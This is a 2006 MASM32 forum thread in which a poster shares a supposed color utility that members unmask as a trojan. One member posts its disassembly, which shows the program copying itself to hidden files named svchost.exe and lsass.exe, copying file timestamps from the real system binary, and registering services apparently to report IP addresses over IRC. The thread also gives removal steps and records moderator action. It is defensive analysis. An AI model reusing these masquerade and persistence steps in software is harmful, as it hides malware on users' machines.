News:

MASM32 SDK Description, downloads and other helpful links
MASM32.com New Forum Link
masmforum WebSite

My first utility

Started by q4lambda, June 28, 2006, 09:37:19 AM

Previous topic - Next topic
Print
Go Down Pages1
User actions

q4lambda

June 28, 2006, 09:37:19 AM Last Edit: June 28, 2006, 12:41:38 PM by hutch--
Check out my awesome color utility:
[removed]

Made it yesterday with masm. What do you think?

TNick

#1
June 28, 2006, 09:54:41 AM
Doesn't work for me. (Windows XP Home edition). No activity in Task Manager.
Don't have time to debug. Maybe latter.

white scorpion

#2
June 28, 2006, 11:24:42 AM
damn!!! keep your junk of this site!

Code Select

00401727 >/$ 68 BF494000    PUSH colors.004049BF                     ; /Arg2 = 004049BF
0040172C  |. 6A 01          PUSH 1                                   ; |Arg1 = 00000001
0040172E  |. E8 99070000    CALL colors.00401ECC                     ; \colors.00401ECC
00401733  |. 83F8 01        CMP EAX,1
00401736  |. 0F84 92020000  JE colors.004019CE
0040173C  |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
00401741  |. 68 BF494000    PUSH colors.004049BF                     ; |PathBuffer = colors.004049BF
00401746  |. 6A 00          PUSH 0                                   ; |hModule = NULL
00401748  |. E8 13070000    CALL <JMP.&kernel32.GetModuleFileNameA>  ; \GetModuleFileNameA
0040174D  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
0040174F  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
00401754  |. E8 2B070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
00401759  |. 68 C2404000    PUSH colors.004040C2                     ; /FileName = "c:\windows\svchost.exe"
0040175E  |. E8 D3060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401763  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401765  |. 68 C2404000    PUSH colors.004040C2                     ; |NewFileName = "c:\windows\svchost.exe"
0040176A  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
0040176F  |. E8 AA060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
00401774  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
00401776  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
0040177B  |. E8 04070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
00401780  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
00401782  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401787  |. E8 F8060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
0040178C  |. 68 DE404000    PUSH colors.004040DE                     ; /FileName = "c:\windows\lsass.exe"
00401791  |. E8 A0060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401796  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401798  |. 68 DE404000    PUSH colors.004040DE                     ; |NewFileName = "c:\windows\lsass.exe"
0040179D  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
004017A2  |. E8 77060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
004017A7  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
004017A9  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
004017AE  |. E8 D1060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
004017B3  |. 6A 00          PUSH 0                                   ; /Mode = OF_READ|OF_SHARE_COMPAT
004017B5  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017BA  |. 68 F8404000    PUSH colors.004040F8                     ; |FileName = "c:\windows\system32\svchost.exe"
004017BF  |. E8 AE060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017C4  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
004017C9  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
004017CE  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
004017D3  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
004017D8  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
004017DE  |. E8 71060000    CALL <JMP.&kernel32.GetFileTime>         ; \GetFileTime
004017E3  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
004017E9  |. E8 2A060000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
004017EE  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
004017F0  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017F5  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
004017FA  |. E8 73060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017FF  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
00401804  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401809  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
0040180E  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
00401813  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401819  |. E8 6C060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
0040181E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
00401824  |. E8 EF050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
00401829  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
0040182B  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
00401830  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401835  |. E8 38060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
0040183A  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
0040183F  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401844  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
00401849  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
0040184E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401854  |. E8 31060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
00401859  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
0040185F  |. E8 B4050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
00401864  |. 68 DB404000    PUSH colors.004040DB                     ;  ASCII " 1"
00401869  |. 68 C2404000    PUSH colors.004040C2                     ;  ASCII "c:\windows\svchost.exe"
0040186E  |. E8 0D080000    CALL colors.00402080
00401873  |. 68 F5404000    PUSH colors.004040F5                     ;  ASCII " 2"
00401878  |. 68 DE404000    PUSH colors.004040DE                     ;  ASCII "c:\windows\lsass.exe"
0040187D  |. E8 FE070000    CALL colors.00402080
00401882  |. 6A 02          PUSH 2
00401884  |. 6A 00          PUSH 0
00401886  |. 6A 00          PUSH 0
00401888  |. E8 83090000    CALL <JMP.&advapi32.OpenSCManagerA>


and a whole lot more where that came from...
Don't open this program!

TNick

#3
June 28, 2006, 11:37:43 AM
I will have have time to debug from now on. :(

zooba

#4
June 28, 2006, 11:43:29 AM
Quote from: TNick on June 28, 2006, 11:37:43 AM
I will have have time to debug from now on. :(

If your computer is still on you should be fine :wink

Windows XP has a lot of hoops to jump through to be able to do this stuff, and the only one he's made it through is getting the code onto the computer  :naughty: :cheekygreen:

All the same, I hope this results in the banning of an IP or something similar...

Cheers,

Zooba :U

white scorpion

#5
June 28, 2006, 12:03:12 PM
open registry editor and search for c:\windows\lsass.exe & c:\windows\svchost.exe
remove those keys.
The original files are in C:\windows\system32\

Then reboot and remove c:\windows\lsass.exe & c:\windows\svchost.exe
both are hidden so you might want to use attrib -h first.
I haven't went through the rest of the code since i'm at work now, but if you still need help then let me know.

@TNick, i know how you feel, i feel the same way. But you might want to change your post a little since it's not allowed on the board  :(

zooba

#6
June 28, 2006, 01:11:51 PM
Having had a look through most of the code, it seems to register some fake services (probably the two files you suggested Scorpion) to connect to IRC and send IP addresses. Admittedly, I haven't used some of the APIs in there before so I don't know exactly what they do, but this is definitely bound for being removed once the mods arrive.

hutch--

#7
June 28, 2006, 01:17:21 PM
Done.  :bg
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

white scorpion

#8
June 28, 2006, 01:30:47 PM
Thanks!
Print
Go Up Pages1
User actions